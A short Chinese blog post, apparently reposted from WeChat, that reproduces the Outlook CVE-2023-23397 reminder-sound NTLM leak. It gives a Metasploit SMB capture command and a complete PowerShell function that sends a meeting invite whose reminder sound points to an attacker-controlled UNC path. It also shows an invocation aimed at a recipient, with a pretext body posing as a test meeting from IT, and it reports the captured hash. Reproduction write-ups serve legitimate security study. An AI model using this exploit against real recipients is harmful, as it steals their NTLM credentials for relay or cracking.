CVE-2023-23397(危险的约会铃声)
2023-3-27 14:36:46 Author: 边界骇客(查看原文) 阅读量:29 收藏

前言:CVE-2023-23397这个漏洞挺简单的,简单复现一下及说一下原理。

1.ReminderSoundFile属性

ReminderSoundFile是outlook的一个属性,返回或设置一个指示当 Outlook 项目的提醒发生时将播放该声音文件的路径和文件名称的 字符串 。

功能点所在的地方:

会议→提醒→需要先选时间→声音

其中声音的路径支持UNC_PATH,既然支持UNC_PATH就直接SMB_RELAY。

如下图所示:

2.复现

两种方式复现:

1.通过图形化界面操作

1.新建会议2.设置提醒时间3.设置提醒声音指向匿名共享的文件夹的声音文件4.关闭匿名共享,然后开启relay

2.github脚本

https://github.com/api0cradle/CVE-2023-23397-POC-Powershell

gayhub已经有现成的脚本了,直接利用即可(必须运行OUTLOOK,并登陆)

1.开启SMB监听

use auxiliary/server/capture/smbrun

2.powershell键入函数

function Send-CalendarNTLMLeak ($recipient, $remotefilepath, $meetingsubject, $meetingbody){    $Outlook = New-Object -comObject Outlook.Application    $newcal = $outlook.CreateItem('olAppointmentItem')    $newcal.ReminderSoundFile = $remotefilepath    $newcal.Recipients.add($recipient)    $newcal.MeetingStatus = [Microsoft.Office.Interop.Outlook.OlMeetingStatus]::olMeeting    $newcal.Subject = $meetingsubject    $newcal.Location = "Virtual"    $newcal.Body = $meetingbody    $newcal.Start = get-date    $newcal.End = (get-date).AddHours(2)    $newcal.ReminderOverrideDefault = 1    $newcal.ReminderSet = 1    $newcal.ReminderPlaysound = 1    $newcal.send()}

3.执行函数

Send-CalendarNTLMLeak -recipient "查鲁特真帅@qq.com" -remotefilepath "\\192.168.109.129\d.wav" -meetingsubject "Test Meeting" -meetingbody "Just a test meeting from IT, can be deleted"

4.发现的时候会有一个弹窗告警需要同意(这是发件人弹窗,并非受害人弹窗)

5.然后就自动弹窗触发

6.触发UNC_PATH成功抓到HASH

写在最后:微软的SMB毒瘤已经很久了,你们猜这次触发是通过什么东西触发UNC_path的

:.゚ヽ(。◕‿◕。)ノ゚.:。+゚防盗专用。:.゚ヽ(。◕‿◕。)ノ゚.:。+゚

 ^_^文章来源:微信公众号(边界骇客) ^_^ ^_^


文章来源: http://mp.weixin.qq.com/s?__biz=MzU1NTkzMTYxOQ==&mid=2247485516&idx=1&sn=ac2bf6485b5b7f9ded9897f5d8514994&chksm=fbcd8ac0ccba03d6fda15f5e7283812763a2acb884256b743f7cf573d724385b3c8a0cab0f3d#rd
如有侵权请联系:admin#unsafe.sh